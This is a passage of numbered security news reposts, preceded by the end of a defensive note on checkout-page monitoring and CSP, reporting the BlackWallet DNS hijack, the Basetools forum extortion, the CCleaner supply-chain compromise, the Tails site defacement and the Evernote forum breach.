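The diff is a monitoring control (run it against the live checkout page on a schedule); the CSP is a preventive one, and with hash-based `script-src` the appended inline block above would not execute even if the diff were never run. Neither replaces finding how the template was modified in the first place.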
  21. As the price of Bitcoin and other cryptocurrencies surges, the cybercriminal community is exploring the opportunity to steal user funds, as every now and then there are incidents involving hackers targeting unsuspecting investors by hacking an exchange or a wallet. The latest victim of a hack attack against cryptocurrencies is the web-based BlackWallet, used for storing Stellar Lumens (XLM). Reportedly, hackers successfully targeted BlackWallet this weekend (January 13th) and stole $444,000 in XLM.
How hackers hacked BlackWallet
The incident has been confirmed by the admin and creator of BlackWallet, and an official statement has also been posted on Reddit, according to which hackers compromised the hosting account of BlackWallet’s website (BlackWallet.co), then hijacked its DNS (Domain Name Servers) and redirected it to a fake website that looked exactly like BlackWallet’s. Following the change, the moment an unsuspecting user signed in on the fake website their funds would go straight to the wallet owned by the hackers. Moreover, the hackers placed code that, with every sign-in, would move any balance over 20 Lumens (the amount needed to keep the wallet intact) to their account. In total, hackers were able to transfer Stellar Lumens (XLM) worth $444,000, the majority of which went to SDF and the Bittrex cryptocurrency exchange, where the hackers will probably convert the stolen funds without getting their identity exposed. According to a Tweet by Kevin Beaumont, an IT security researcher who examined the code placed by the hackers, “The DNS hijack of Blackwallet injected code if you had over 20 Lumens it pushes them to a different wallet.”
What is next
The creator of BlackWallet, on the other hand, has asked the hosting firm to disable their account. They have also contacted SDF and Bittrex to freeze the stolen funds; however, it is unclear whether both parties will be able to cooperate or whether there has been any response from them.
The BlackWallet admin is also advising customers to immediately transfer their funds to another wallet if they entered their key on BlackWallet. Users can transfer their funds using the Stellar account viewer. At the time of publishing this article, BlackWallet’s website was offline and displaying a 403 error. To read about previous data breaches and hack attacks against cryptocurrency wallets and exchanges, follow this link. source
  22. Extortion can also be funny when it happens to the bad guys, and there's one extortion attempt going on right now that will put a big smile on your face. The victim is Basetools.ws, an underground hacking forum that allows users to trade stolen credit card information, profile data, and spamming tools. The site boasts of having over 150,000 users and over 20,000 tools listed in its forums. Earlier this week, on Tuesday, an anonymous user appears to have breached the site and uploaded samples of its database online, along with a ransom demand. The attacker is asking for $50,000, or he'll share data on the site's administrator with US authorities such as the FBI, DHS, DOJ, and the DOT (Department of Treasury). To prove the validity of his claims, the hacker shared an image of the Basetools admin panel and an image containing the site admin's login details and IP address. In addition, the hacker also dumped tools that Basetools users were selling on the site, such as login credentials for cPanel accounts; login credentials for shells, backdoors, and spambots hosted on hacked sites; credentials for RDP servers; server SSH credentials; user data leaked from various breaches at legitimate sites; and many more. As soon as the ransom demand and accompanying data were published online, the Basetools portal went offline and entered maintenance mode. "Yeah, the fact that site is down right now certainly doesn't look good for them," security researcher Dylan Katz told Bleeping Computer today regarding the possibility of the ransom demand being a fake breach. Nonetheless, "50k is a pretty steep ransom, seeing as the damage has already been done," Katz added. But financial gain is not the only motivation behind this hack. According to other text included in the ransom demand, the hacker also appears to have carried out the hack out of revenge, claiming the site's operator has been manipulating stats.
"Basetools.pw is manipulating EARNING STATS & RESELLER STATS, Owner of this market has opened a reseller with name RedHat which always stays in First Place," the text reads.

Lots of sensitive data leaked online

Despite the "small potatoes" feel you get when reading about a breach at a hackers' forum, this security incident is quite notable. All the Basetools seller data that was supposedly being sold on the forums before the hack is now online and easily accessible to anyone. This means that credentials for thousands of servers are now within easy reach of anyone who knows where to look. Other hackers could take over these servers and deploy them in spam, malware hosting, or other malicious campaigns. The owners of these servers will need to be notified so they can change credentials and clean up the affected systems. Furthermore, Katz has also identified user data that appears to come from services that have not previously announced that they suffered a data breach. These services will also need to be notified so they can investigate any potential breaches and reset passwords for affected accounts. Katz is currently processing the leaked data and intends to reach out to some of the affected parties. Article
  23. Hackers broke into British company Piriform’s free software for optimizing computer performance last month, potentially allowing them to control the devices of more than two million users, the company and independent researchers said on Monday. The malicious program was slipped into legitimate software called CCleaner, which is downloaded for personal computers and Android phones as often as five million times a week. It cleans up junk programs and advertising cookies to speed up devices. CCleaner is the main product made by London’s Piriform, which was bought in July by Prague-based Avast, one of the world’s largest computer security vendors. At the time of the acquisition, the company said 130 million people used CCleaner. A version of CCleaner downloaded in August included remote administration tools that tried to connect to several unregistered web pages, presumably to download additional unauthorized programs, security researchers at Cisco’s (CSCO.O) Talos unit said. Talos researcher Craig Williams said it was a sophisticated attack because it penetrated an established and trusted supplier, in a manner similar to June’s “NotPetya” attack on companies that downloaded infected Ukrainian accounting software. “There is nothing a user could have noticed,” Williams said, noting that the optimization software carried a valid digital signature, which means that other computers automatically trust the program. In a blog post, Piriform confirmed that two programs released in August were compromised. It advised users of CCleaner v5.33.6162 and CCleaner Cloud v1.07.3191 to download new versions. A spokeswoman said that 2.27 million users had downloaded the August version of CCleaner, while only 5,000 users had installed the compromised version of CCleaner Cloud. Piriform said that Avast, its new parent company, had uncovered the attacks on Sept. 12.
A new, uncompromised version of CCleaner was released the same day and a clean version of CCleaner Cloud was released on Sept. 15, it said. The nature of the attack code suggests that the hacker won access to a machine used to create CCleaner, Williams said. CCleaner does not update automatically, so each person who has installed the problematic version will need to delete it and install a fresh version, he said. Williams said that Talos detected the issue at an early stage, when the hackers appeared to be collecting information from infected machines, rather than forcing them to install new programs. Piriform said it had worked with U.S. law enforcement to shut down a server located in the United States to which traffic was set to be directed. It said the server was closed down on Sept. 15 “before any known harm was done”. Source
  24. Just a few hours ago, the official website of the Tails operating system was hacked, and it appears that a self-proclaimed 17-year-old hacker breached and defaced it. Tails is a Linux-based, highly secure operating system, specially designed and optimized to preserve users' anonymity and privacy. The hacker, who calls himself "Sum guy", managed to access the website as administrator and edited the homepage content with the following message: You has been haxoredeszed by sum dumb 17 year old by accident... Sorry about that please forgive me! I accidentally logged myself in as someone important and changed the site, not knowing that what I was changing would save! So sorry about that... I hope you have a backup, Oh and btw I love your OS! Yours sincerely, Sum guy And before I leave, Hi ed... and zoin Defaced link: https://tails.boum.org/index.en.html. All other pages on the Tails website are working just fine, but at this moment it is not clear whether the hacker has also modified the OS image or not. Readers are therefore advised not to download the Tails OS from the website, at least for a few days. Tails, also known as 'The Amnesic Incognito Live System', is free software based on Debian GNU/Linux; you install it on a DVD or USB drive and boot the computer from that drive. This allows you to work on a sensitive file on any computer and prevents the data from being recovered after the computer is turned off. Tails was reportedly used by the NSA whistle-blower Edward Snowden in discussions with journalists because it includes a range of tools for protecting your data by means of strong encryption. I will update the story after receiving more details on the hack. Stay Tuned. Source
  25. Note-taking and archiving app Evernote has announced that its discussion forum has been hacked, compromising some users’ passwords, dates of birth and email addresses. The hack was revealed yesterday afternoon in a post by an Evernote forum admin, saying that “The vendor that operates https://discussion.evernote.com has notified us that they had been hacked. The hacker was able to retrieve our forum members’ profile information. We don’t believe that the hacker accessed any private forum messages.” The company was at pains to emphasise that only forum passwords dating from 2011 or earlier were compromised, and not passwords for Evernote itself. Users' notes themselves are secure. However, as security expert Graham Cluley points out, users may be vulnerable if they re-used their forum password elsewhere. Users who joined Evernote after 2011 should not need to change their passwords, as Evernote introduced a single password system for the forum and the app, a system which did not see password data sent to the third party responsible for hosting the forum. According to ZDNet, the Evernote forum currently has 164,644 registered members; Evernote has not disclosed how many were affected by the hack. Evernote has reached out to the users who were affected. According to posts on the forum discussing the hack, the passwords which were compromised had been ‘hashed’ – stored as the output of a one-way function rather than in plaintext, which provides a basic level of protection. Last Tuesday Evernote was the subject of a denial-of-service (DoS) attack that stopped users accessing their accounts. The DoS attack had been repelled by the following day, and Evernote reassured customers that no hacking had taken place during the attack. Following a major hack in 2013 that saw intruders able to reset user passwords and access full personal details, Evernote introduced an optional two-factor authentication system, whereby users could use a code sent to their smartphone to prove their identity. Evernote has more than 100m users. Source